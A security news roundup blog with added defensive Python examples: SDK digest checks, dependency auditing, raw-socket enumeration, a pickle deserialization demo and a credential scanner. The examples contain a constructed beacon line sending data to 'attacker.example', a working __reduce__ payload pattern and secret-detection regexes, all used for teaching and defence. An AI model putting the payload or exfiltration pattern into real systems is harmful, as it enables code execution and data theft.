Posted on by Scott Walsh
Sean is on a well-earned vacation this week, so I will be filling in!
Trusting Third Party SDKs- If you know about traditional MitM attacks, then this idea is an evolutionary step: MitM the SDK download itself and let the resulting binaries do the dirty work for you. Every app built against the tampered SDK ships the attacker's code. Expect the numbers in this article to continue to drop as we head toward a more encrypted Internet.
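The check a practitioner wants for the scenario above is integrity verification of the SDK against a digest obtained over a different, authenticated channel than the download itself. The example below is added here and is not code from the article or from any SDK vendor; the SDK bytes and the "published" digest are constructed for the demo.

```python
"""Verify a downloaded SDK against a digest published out-of-band.

Added example, not code from the article. GENUINE_SDK, TAMPERED_SDK and
PUBLISHED_DIGEST are constructed; in practice the digest would come from
the vendor over an authenticated channel (an HTTPS release page, signed
release notes), never from the same unauthenticated download.
"""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_artifact(data: bytes, published_hex: str) -> bool:
    """True only if the download hashes to the digest the vendor published.

    hmac.compare_digest is used so the comparison does not leak the mismatch
    position through timing; not critical for a local file check, but a good
    habit for any comparison of digests or secrets.
    """
    return hmac.compare_digest(sha256_hex(data), published_hex.lower())


def verify_manifest(files: dict, manifest: dict) -> list:
    """Check a set of downloaded files against a vendor manifest.

    files:    {filename: bytes} as downloaded
    manifest: {filename: sha256 hex} as published
    Returns the names that are missing or do not match; an empty list means
    every file in the manifest verified.
    """
    bad = []
    for name, expected in manifest.items():
        data = files.get(name)
        if data is None or not verify_artifact(data, expected):
            bad.append(name)
    return bad


# --- constructed demo data (not a real SDK) ---------------------------------
GENUINE_SDK = b"// sdk v1.2.3 (constructed)\nfunction track(e) { send(e); }\n"
# an on-path attacker appends a beacon while the SDK is in transit over HTTP
TAMPERED_SDK = GENUINE_SDK + b"function beacon(d) { send(d, 'attacker.example'); }\n"
PUBLISHED_DIGEST = sha256_hex(GENUINE_SDK)  # stands in for the vendor's release page


if __name__ == "__main__":
    print("genuine verifies :", verify_artifact(GENUINE_SDK, PUBLISHED_DIGEST))
    print("tampered verifies:", verify_artifact(TAMPERED_SDK, PUBLISHED_DIGEST))
    print("manifest failures:", verify_manifest(
        {"sdk.js": TAMPERED_SDK},
        {"sdk.js": PUBLISHED_DIGEST, "sdk.map": "00" * 32}))
```

The caveat: if the attacker can tamper with both the download and the page that publishes the digest, this check proves nothing. The digest (or better, a signature) has to arrive over a channel the attacker cannot modify, which in the end means HTTPS with a verified certificate, the very thing the article notes is becoming universal.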
Malware Gets Better Support than Hardware- An evolved variant of 'Mirai', called 'Satori', has been infecting home routers from Huawei, Realtek, and Dasan at an alarming rate. It even gets updates, which is more than can be said for the hardware it is exploiting. Whereas Mirai could be kept out by changing the device's default password, Satori exploits firmware vulnerabilities, so a password change alone does not help.
Responding to Vulnerabilities in an Open Source World- This article focuses on how to respond quickly to vulnerabilities in the open source components your products are built on. There is a heavy emphasis on tooling and automation, which is critical to getting updates out quickly and efficiently.
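The automation the article argues for starts with something simple: comparing what you have pinned against what is known to be vulnerable. The script below is an added example, not code from the article; the lockfile, the package names and the advisory identifiers are all constructed (a real run would consume an advisory feed for the ecosystem in question).

```python
"""Flag pinned dependencies that fall inside a known-vulnerable version range.

Added example, not from the article. The lockfile text, package names and
ADV-CONSTRUCTED-* identifiers are constructed; a real workflow would pull
advisories from a feed such as the NVD or the ecosystem's advisory database.
"""
import re
from typing import List, Tuple

Version = Tuple[int, ...]

# name==1.2.3 style pins, as in a pip requirements lockfile; trailing comments allowed
PIN_RE = re.compile(r"^\s*([A-Za-z0-9_.\-]+)\s*==\s*([0-9][0-9A-Za-z.\-]*)\s*(#.*)?$")


def parse_version(text: str) -> Version:
    """'1.10.2' -> (1, 10, 2); a pre-release suffix such as 'rc1' is dropped."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def parse_lockfile(text: str) -> dict:
    pins = {}
    for line in text.splitlines():
        m = PIN_RE.match(line)
        if m:
            pins[m.group(1).lower()] = parse_version(m.group(2))
    return pins


# advisory: (package, first vulnerable version inclusive, fixed version exclusive, id)
Advisory = Tuple[str, str, str, str]


def find_vulnerable(lockfile: str, advisories: List[Advisory]) -> List[Tuple[str, str, str]]:
    """Return (package, pinned version, advisory id) for every affected pin."""
    pins = parse_lockfile(lockfile)
    hits = []
    for pkg, introduced, fixed, adv_id in advisories:
        pinned = pins.get(pkg.lower())
        if pinned is None:
            continue
        # tuple comparison gives correct numeric ordering (1.10 > 1.9)
        if parse_version(introduced) <= pinned < parse_version(fixed):
            hits.append((pkg, ".".join(map(str, pinned)), adv_id))
    return hits


# --- constructed inputs: fictional packages and advisories ------------------
LOCKFILE = """\
# constructed requirements.txt
examplelib==2.18.0
parsekit==3.12   # pinned a long time ago
webframe==0.12.2
"""

ADVISORIES = [
    ("examplelib", "2.1.0", "2.20.0", "ADV-CONSTRUCTED-1"),
    ("parsekit", "0", "5.1", "ADV-CONSTRUCTED-2"),
    ("webframe", "1.0", "1.0.1", "ADV-CONSTRUCTED-3"),  # pin predates the range: not affected
]

if __name__ == "__main__":
    for pkg, ver, adv in find_vulnerable(LOCKFILE, ADVISORIES):
        print(f"{pkg}=={ver} is affected by {adv}")
```

Wire this into CI so the build fails on a non-empty result, and the "respond quickly" part becomes a pull request that bumps the pin rather than a meeting.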
Linux Malware Using Raw Sockets- Another malware variant, this time derived from 'sebd' and called 'Chaos', is making the rounds on Linux servers. Because it receives traffic on a raw socket, it can see packets arriving at a port that a legitimate service already has bound, without binding that port itself, which makes for a very stealthy listener: nothing new shows up as a listening socket.
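Since a raw-socket listener never appears in the usual list of listening TCP/UDP ports, the defender's check is to enumerate raw and packet sockets directly. The script below is an added example, not code from the article or from the Chaos sample; it parses /proc/net/raw and /proc/net/packet in the kernel's own format, with the two tables constructed here so it runs offline.

```python
"""Enumerate raw and packet sockets, the kind a sniffing backdoor uses to
receive traffic without binding a port.

Added example, not from the article or the Chaos sample. RAW_SAMPLE and
PACKET_SAMPLE are constructed in the format of /proc/net/raw and
/proc/net/packet; on a live host read those files (and /proc/net/raw6),
then map the inode column to a process via /proc/<pid>/fd.
"""
from typing import List, Dict

IP_PROTO = {1: "ICMP", 6: "TCP", 17: "UDP", 255: "RAW"}
ETH_PROTO = {0x0003: "ETH_P_ALL", 0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}


def parse_proc_net_raw(text: str) -> List[Dict]:
    """/proc/net/raw: for a raw socket the 'port' half of local_address is
    the IP protocol number it receives (0006 = TCP), not a TCP/UDP port."""
    out = []
    for line in text.splitlines()[1:]:          # skip the header row
        f = line.split()
        if len(f) < 10:
            continue
        _local_ip_hex, proto_hex = f[1].split(":")
        out.append({
            "family": "AF_INET/SOCK_RAW",
            "protocol": IP_PROTO.get(int(proto_hex, 16), proto_hex),
            "uid": int(f[7]),
            "inode": int(f[9]),
        })
    return out


def parse_proc_net_packet(text: str) -> List[Dict]:
    """/proc/net/packet: AF_PACKET sockets. Type 3 is SOCK_RAW (whole frames);
    Proto 0003 (ETH_P_ALL) means every frame on the interface is delivered."""
    out = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 9:
            continue
        out.append({
            "family": "AF_PACKET/" + ("SOCK_RAW" if f[2] == "3" else "SOCK_DGRAM"),
            "protocol": ETH_PROTO.get(int(f[3], 16), f[3]),
            "uid": int(f[7]),
            "inode": int(f[8]),
        })
    return out


def suspicious(entries: List[Dict]) -> List[Dict]:
    """Sockets that receive all TCP segments or all frames. A starting point
    for triage, not a verdict: tcpdump and friends look the same, so check
    which process owns the inode before drawing conclusions."""
    return [e for e in entries if e["protocol"] in ("ETH_P_ALL", "TCP")]


# --- constructed samples in the kernel's column layout ----------------------
RAW_SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   0: 00000000:0001 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 18111 2 0000000000000000 0
   1: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 40920 2 0000000000000000 0
"""
PACKET_SAMPLE = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
0000000000000000 3      3    0003   2     1 0      0      40931
0000000000000000 3      2    0800   2     1 0      1000   22050
"""


def read_live() -> List[Dict]:
    """Read the real tables on a Linux host; empty elsewhere."""
    entries = []
    for path, parser in (("/proc/net/raw", parse_proc_net_raw),
                         ("/proc/net/packet", parse_proc_net_packet)):
        try:
            with open(path) as fh:
                entries += parser(fh.read())
        except OSError:
            pass
    return entries


if __name__ == "__main__":
    for e in suspicious(parse_proc_net_raw(RAW_SAMPLE) + parse_proc_net_packet(PACKET_SAMPLE)):
        print(e)
```

In the constructed data, inode 40920 is a raw IPPROTO_TCP socket: it sees every inbound TCP segment regardless of which daemon owns the port, which is exactly how a backdoor can sit behind a live web server without any new port appearing.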
NK Reaper Campaign- A full PDF from FireEye on APT37 (Reaper), a group using malware to further North Korea's interests in the world. They exploit multiple CVEs and deploy multiple malware families.
Posted on by Sean Smith
LavaRand - Leveraging Real World Randomness. Did you know that CloudFlare harvests randomness from lava lamps as an entropy source? By feeding a real-world entropy source into the pseudo-random pool on their servers, they augment it with physical randomness. They have recently posted this article on their motivations for going to the trouble of setting this up.
Fake Symantec Blog Spreading Malware. Researchers have discovered a fake security blog styled to look like the Symantec blog. The site has been taken down, but it contained a post urging readers to download a 'security tool' that was actually a variant of the Proton credential stealer.
Vulnerability Equities Process Transparency. The White House has announced additional transparency around the factors that determine whether government agencies notify vendors about vulnerabilities they discover. Mozilla feels it is a step in the right direction, but several security researchers are skeptical: notably Bruce Schneier, who suggests this is just additional window dressing and that time will tell; Adam Shostack, who points out the long list of threats that are not considered factors in the VEP (https://adam.shostack.org/blog/2017/11/vulnerabilities-equities-process-and-threat-modeling/); and Sophos, who point out that this year we have seen plenty of undisclosed vulnerabilities stolen and weaponized.
Session Recording Tools Scoop Up Excessive Data. Use a service that records what users do on your site (for analytics and usability review)? It may be collecting far more than you expect: many of these scripts record every keystroke and mouse click, including input the user never actually submits, and in some cases researchers observed them capturing passwords, credit card numbers, and other PII.
New OWASP Top 10. The Open Web Application Security Project (OWASP) has released a new version of its Top 10 web application risks this year. Unsurprisingly, injection is still listed as the #1 risk. However, there are three new entries. The first is XML External Entities (XXE), where an XML parser (in an API or otherwise) processes a document that declares external entities and loads external content, which can disclose local files, cause DoS, or in some configurations lead to remote code execution. The second is Insecure Deserialization, which honestly feels very similar to injection and XXE but targets object de/serialization: an attacker supplies a crafted serialized object so that deserializing it invokes code of their choosing, up to remote code execution. Finally, there is Insufficient Logging and Monitoring, where not knowing what is going on greatly lengthens defenders' reaction time and increases the likelihood that an attack succeeds.
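The deserialization entry is easiest to understand with the vulnerable call next to a hardened one. The example below is added here and is not from the OWASP document; it uses Python's pickle as the concrete format (the same shape of bug exists in Java, PHP and .NET serializers), and `record` is a constructed stand-in for `os.system` so the demonstration is harmless.

```python
"""Insecure deserialization (pickle.loads on attacker bytes) beside a restricted loader.

Added example, not from the OWASP Top 10. `record` is a constructed stand-in
for os.system so the payload is harmless; a real payload would name os.system
or subprocess.Popen in its __reduce__ instead.
"""
import builtins
import io
import pickle

EXECUTED = []  # records what the payload managed to run


def record(cmd: str) -> int:
    """Stand-in for os.system(cmd): notes the command instead of running it."""
    EXECUTED.append(cmd)
    return 0


class Payload:
    """What an attacker serialises. pickle honours __reduce__, so on load the
    unpickler resolves `record` and calls record("id") before the application
    ever sees an object."""
    def __reduce__(self):
        return (record, ("id",))


def make_payload() -> bytes:
    return pickle.dumps(Payload())


def unsafe_load(data: bytes):
    # Vulnerable: trusts attacker-controlled bytes; any importable callable is resolved and invoked.
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened: only a fixed allow-list of builtins may be resolved as globals.
    Anything else (os.system, subprocess.Popen, this module's record) is refused
    before it is called."""
    ALLOWED = {"dict", "list", "tuple", "set", "frozenset", "str", "int", "float", "bool", "bytes"}

    def find_class(self, module, name):
        if module == "builtins" and name in self.ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if the restricted loader refuses the payload (having run nothing)."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def roundtrip_plain(obj):
    """Plain data (dicts, lists, strings, numbers) still loads through the restricted loader."""
    return safe_load(pickle.dumps(obj))


if __name__ == "__main__":
    p = make_payload()
    print("restricted loader rejected:", is_rejected(p), "executed so far:", EXECUTED)
    unsafe_load(p)
    print("unsafe loader executed:", EXECUTED)
    print("plain data still loads:", roundtrip_plain({"user": "alice", "roles": ["viewer"]}))
```

The allow-list is the point: the safe loader does not try to detect malicious payloads, it refuses to resolve anything it was not told to expect. Where the data is plain records, switching to a data-only format such as JSON removes the class entirely.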
Leveraging Multiple Vulnerabilities To Achieve Exploitation. Now that you have familiarized yourself with the new OWASP Top 10, read this article on how the authors chained several of these issues to reach remote code execution.
Misconfigured API access allows for data harvesting. Security researchers have discovered that many developers using the Twilio messaging API hard-coded their account credentials into their apps, making it possible for anyone who extracts them to pull the account's Twilio metadata without the user noticing. At the time of writing this could affect more than 600 apps across Android and iOS. The same mistake extends to other APIs, such as hard-coded Amazon S3 access keys.
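Finding this in your own apps before someone else does is a matter of scanning the strings in the built artifact. The scanner below is an added example, not code from the research the article cites; the sample strings are constructed, and the two prefix patterns rely on the public formats of the identifiers (a Twilio Account SID is "AC" followed by 32 hex digits; an AWS access key ID is "AKIA" followed by 16 upper-case alphanumerics). Secret halves such as a Twilio auth token have no fixed prefix, so they are caught by proximity to a credential-looking key name.

```python
"""Scan strings pulled out of an app bundle for hard-coded API credentials.

Added example, not from the cited research. SAMPLE_STRINGS is constructed to
resemble what `strings` or an APK decompiler yields; AKIAIOSFODNN7EXAMPLE is
the placeholder key from AWS's own documentation, not a live credential.
"""
import re
from typing import List, Tuple

PATTERNS = {
    "twilio_account_sid": re.compile(r"\bAC[0-9a-fA-F]{32}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # a value assigned to a key name that smells like a secret: 20+ chars of token-ish material
    "generic_secret_assignment": re.compile(
        r"(?i)(auth[_-]?token|secret(?:[_-]?key)?|api[_-]?key)\b\s*[:=]\s*['\"]?([A-Za-z0-9/+=_\-]{20,})['\"]?"),
}


def mask(value: str) -> str:
    """Keep the first and last 4 chars so a finding is recognisable but the report is not itself a leak."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan(strings: List[str]) -> List[Tuple[str, str, str]]:
    """Return (finding type, masked value, source line) for every hit, in input order."""
    findings = []
    for line in strings:
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                # patterns with groups capture the value in their last group; prefix patterns use the whole match
                value = m.group(m.lastindex or 0)
                findings.append((kind, mask(value), line))
    return findings


SAMPLE_STRINGS = [  # constructed; none of these are real credentials
    "TWILIO_ACCOUNT_SID=ACabcdef0123456789abcdef0123456789",
    'twilio_auth_token = "ffffffffffffffffffffffffffffffff"',
    "aws.accessKeyId=AKIAIOSFODNN7EXAMPLE",
    'api_key: "sk_live_constructed_abcdefghijklmnop"',
    "https://api.twilio.com/2010-04-01/Accounts/",
    "Copyright 2017 Example App",
]

if __name__ == "__main__":
    for kind, value, line in scan(SAMPLE_STRINGS):
        print(f"{kind:28} {value:40} <- {line}")
```

Run it over the output of `strings` on the APK or IPA (or on the decompiled source) as a release gate. Any hit means the credential belongs on a server you control, behind an endpoint the app authenticates to, not in the binary.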
Face ID Defeated? On the heels of the speculation in the latest SecurityScorecard podcast comes a claim that Face ID has already been defeated. The technique involved a 3D-printed mask of the target's face with 2D-printed features overlaid on it.
Social login attacks. Social logins, like signing in via Facebook, are everywhere, and attackers are now trying to leverage them for their own gain. Abusing browser extensions (again), an attacker can plant code that waits for you to log into a social account and then uses that logged-in account to create accounts on other services. They can then use those accounts as they see fit, for fraud or to spread their malware even further. InfoSecurity covers this in more detail and gives some tips on how to combat this type of attack.
Inside The Mind of a Bug Bounty Hunter. Bugcrowd has released its annual "Inside the Mind of a Hacker" report. This year 71% of its bug bounty hunters are between 18 and 29, and they are primarily driven by the challenge. The US took the top spot for total number of researchers, overtaking India, which is number two this year.
Your Website is ALWAYS a Target. Think your website isn't really a target because you don't collect user information? Think again! This week brings two stories: one by Troy Hunt, on how attackers can breach your server and ride on your domain's reputation to reduce the likelihood of their malicious activity being shut down, and one by MalwareTech, on malware authors exploiting the same reputation trick to host proxy servers that hide their actual C2 machines.
Pop-Unders Make Their Way To Mobile (Apps). Pop-unders, where a malicious ad redirects you to another site to coerce you into downloading a malicious app, have been around for a number of years. The same idea has now made its way to mobile apps, with one app acting as a dropper that downloads a malicious app and prompts the user to install it, sidestepping a set of app store protections.
The operating system for your operating system. News broke this week that some Intel chipsets run a hidden operating system as part of Intel's 'Management Engine', which had several exploits disclosed back in May. The recent discovery is that it runs its own network stack as well as a web server. More worrying, because it sits so far below the host OS, an exploit there would have a persistent hiding place invisible to the regular user. Worse still, it can potentially make modifications even while the machine is powered off (but still plugged in).
Antivirus abused to install malware. Antivirus is still just software, subject to bugs like any other program. A recent story shows how attackers can leverage such bugs to reinstall malware that has already been quarantined, by abusing the user's ability to restore a quarantined file. The researchers combined this with other techniques to trick the antivirus into restoring the file to a different location, such as privileged and sensitive directories on Windows.
2018 Predictions. With 2017 nearing its end, companies are starting to think about what 2018 will bring. Kaspersky kicks things off with its 2018 predictions. It should be no surprise to anyone following along this year that supply chain attacks and hardware hacks are likely to continue, but it is a good review of current trends.
Posted on by Sean Smith
Digitally Signed Malware Surprisingly Common. Code signing uses a legitimate certificate to sign an application so that operating systems will trust it. However, in some cases we have seen malicious packages that are correctly signed. Originally associated with nation-state attacks and criminal enterprises, researchers have now shown this happens more often than expected, having found 189 instances going back to 2003; 109 of the certificates used to sign these malicious apps are still valid. Some of them had previously signed benign software, meaning the organization may have lost control of its private key. Related research has also been published on broken trust in code signing and antivirus. Most shocking is that a file merely carrying a signature, even one made with an expired key or one that does not match the file, leads a number of antivirus products to mark it as benign, abusing that trust. Perhaps more interesting is the ability to hijack signatures, which one researcher has demonstrated.
Mobile Pwn2Own Competition Results. Pwn2Own is a yearly competition in which hackers compete to demonstrate zero-days in browsers. Last year it expanded to virtual machines, and this year it has its own competition for mobile devices. A large number of bugs were demonstrated against devices including the Samsung Galaxy S8 and the iPhone 7, all of which have been privately disclosed to the manufacturers for patching. You can read the details for day one and day two.
Spam And Phishing Q3 Report. Want to stay on top of the latest spam and phishing techniques? Kaspersky has released its Q3 observations. Highlights include messages trying to coerce people into cryptocurrency get-rich-quick schemes and offers of free stuff (from flights to phones).
Account Takeovers. Google has released research into the root causes of account takeovers. While it is not particularly surprising that a fair portion is due to credential reuse (use unique passwords everywhere!), a fair amount is harvested via phishing and keyloggers. Phishing attacks increasingly try to collect information beyond the password, to help circumvent other protections.
Companies Actively Trying To Work Around Browser Security Warnings. What's worse than a company not serving a form over HTTPS? Actively working around browser protections to pretend everything is all right. Check out this... interesting story of the effort one company put into evading browser checks rather than just deploying HTTPS.
Size Matters Not. At least in terms of your risk of being exploited. Regardless of what your website actually does, it is valuable to an attacker as a resource. Even if you have nothing to steal directly, an attacker can leverage your infrastructure to run phishing campaigns, malvertising, or spam with less risk to themselves (and more risk to you!).
DarkVNC Deep Dive. And for those who like deep dives, check out this article walking through an exploit chain that infects a victim with 'DarkVNC', a malicious VNC implant that lets attackers view and control the machine remotely.
Posted on by Sean Smith
CyberSecurity Month Wraps Up. WeLiveSecurity has finished its expanded coverage of Twitter conversations. You can check out Part 3, covering "CyberAwareness", and Part 4, on the Internet of Things.
Hardware Hacking. Speaking of the Internet of Things, this week brings an interesting article from a pentester giving his view of hardware hacking. It covers a number of attack vectors we have seen over the last year (no surprise that outdated software is #1 on the list), but also more interesting material for those with physical access.
Terrifying USB Find. I know this week was Halloween, but the news about a USB drive containing plaintext files on Heathrow Airport's security was downright terrifying. The contents included, but were not necessarily limited to, details about security badges, patrol routes, and even travel routes for the Queen and other visiting dignitaries.
Google's Recaptcha Broken. Google's system for distinguishing people from bots has been broken again. This time researchers leveraged improvements in speech-to-text engines to solve the audio challenge, passing ~85% of captchas in ~5.4 seconds on average.
"Smart" Locks. Amazon has recently announced a lock system that would allow couriers to deliver packages straight into your home. This is a risky proposition, and Malwarebytes gives some good reasons why, including security vulnerabilities and accidentally getting locked out of your own home.
Chrome to remove Public Key Pinning. Chrome developers have signaled their intention to remove HTTP Public Key Pinning (HPKP) support from the browser in 2018. PKP let a site specify which public keys may appear in the certificate chain used to serve it. In practice it has proven difficult to roll out: a misconfiguration, or a key rotation that does not match the pinned set, locks users out of the site until the pin's max-age expires. Google now advocates Certificate Transparency, which it has made mandatory, to detect mis-issued certificates and protect users from them.
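The outage mode described above is mechanical enough to lint for. The checker below is an added example, not Chrome's or Google's code; it encodes the RFC 7469 rules that a Public-Key-Pins header must carry at least two pin-sha256 values, at least one matching a key in the served chain and at least one backup pin for a key not in the chain, plus a max-age. A pin is the base64 of the SHA-256 of the DER-encoded SubjectPublicKeyInfo; the SPKI blobs and headers used here are constructed stand-ins, and the 60-day max-age warning threshold is the linter's own, not from the RFC.

```python
"""Lint a Public-Key-Pins header for the misconfigurations that caused outages.

Added example, not from Chrome or Google. RFC 7469: at least two pin-sha256
values, one matching the served chain and one backup not in the chain, plus
max-age. LEAF_SPKI, INTERMEDIATE_SPKI and BACKUP_SPKI are constructed byte
strings standing in for real DER SubjectPublicKeyInfo structures.
"""
import base64
import hashlib
from typing import Dict, List

MAX_AGE_WARN_SECONDS = 60 * 24 * 3600   # linter's own threshold, not an RFC value


def spki_pin(spki_der: bytes) -> str:
    """pin-sha256 value for a DER SubjectPublicKeyInfo: base64(SHA-256(SPKI))."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()


def parse_hpkp(header: str) -> Dict:
    """Split 'pin-sha256="..."; pin-sha256="..."; max-age=N; includeSubDomains'."""
    pins, directives = [], {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")      # split on the first '=' only: base64 pins end in '='
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "pin-sha256":
            pins.append(value)
        else:
            directives[name] = value
    return {"pins": pins, "directives": directives}


def lint_hpkp(header: str, chain_spki: List[bytes]) -> List[str]:
    """Return human-readable problems; an empty list means the header is deployable.
    chain_spki: DER SPKI of each certificate in the chain actually being served."""
    parsed = parse_hpkp(header)
    pins = parsed["pins"]
    problems = []
    for p in pins:
        try:
            raw = base64.b64decode(p, validate=True)
        except ValueError:                        # binascii.Error is a ValueError
            raw = b""
        if len(raw) != 32:
            problems.append(f"pin {p!r} is not base64 of a 32-byte SHA-256 digest")
    if len(pins) < 2:
        problems.append("fewer than two pins: RFC 7469 requires a backup pin, or the next key rotation locks users out")
    served = {spki_pin(s) for s in chain_spki}
    if not served & set(pins):
        problems.append("no pin matches a key in the served chain: browsers that already noted older pins will reject the site until max-age expires")
    if not (set(pins) - served):
        problems.append("every pin is in the current chain: there is no backup pin to rotate to")
    max_age = parsed["directives"].get("max-age")
    if max_age is None or not max_age.isdigit():
        problems.append("missing or non-numeric max-age")
    elif int(max_age) > MAX_AGE_WARN_SECONDS:
        problems.append(f"max-age {max_age}s is long: a bad pin stays bad in every visitor's browser for that long")
    return problems


# --- constructed stand-ins; real SPKIs are DER blobs taken from the certificates ----
LEAF_SPKI = b"constructed-leaf-spki"
INTERMEDIATE_SPKI = b"constructed-intermediate-spki"
BACKUP_SPKI = b"constructed-offline-backup-key-spki"   # key kept offline, deliberately not in the chain
CHAIN = [LEAF_SPKI, INTERMEDIATE_SPKI]

GOOD_HEADER = (f'pin-sha256="{spki_pin(LEAF_SPKI)}"; pin-sha256="{spki_pin(BACKUP_SPKI)}"; '
               'max-age=5184000; includeSubDomains')
# the classic outage: only the live key pinned, so a rotation bricks the site
NO_BACKUP_HEADER = f'pin-sha256="{spki_pin(LEAF_SPKI)}"; max-age=5184000'
# a pin that matches nothing actually served
WRONG_PIN_HEADER = (f'pin-sha256="{spki_pin(b"some-other-key")}"; pin-sha256="{spki_pin(BACKUP_SPKI)}"; '
                    'max-age=5184000')

if __name__ == "__main__":
    for name, hdr in (("good", GOOD_HEADER), ("no backup", NO_BACKUP_HEADER), ("wrong pin", WRONG_PIN_HEADER)):
        print(name, "->", lint_hpkp(hdr, CHAIN) or "ok")
```

Note what the linter cannot catch: the backup key has to actually exist, be kept offline, and be the one you rotate to. That operational burden, more than the header syntax, is why Chrome is walking away from pinning in favour of Certificate Transparency, which detects mis-issuance without giving the site operator a way to lock out their own users.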
Dell Loses Control of Update Domain. Earlier this month we learned that Dell lost control of a domain designed to help customers recover from malware. Ironically, it was taken over by malware authors and was likely used to serve the very kind of malware it was meant to help customers deal with.
More Malicious Chrome Extensions. The latest appears to be spread by phishing attacks and is used to harvest any data posted to forms, such as usernames, passwords and people's Facebook updates.
Malware Analysis Via API Calls. Malwarebytes is seeing more obfuscation in malware, making static analysis harder for analysts. Rather than reverse engineering the outer layer, they walk through dynamically tracing the system API calls the sample makes to see what it is actually doing.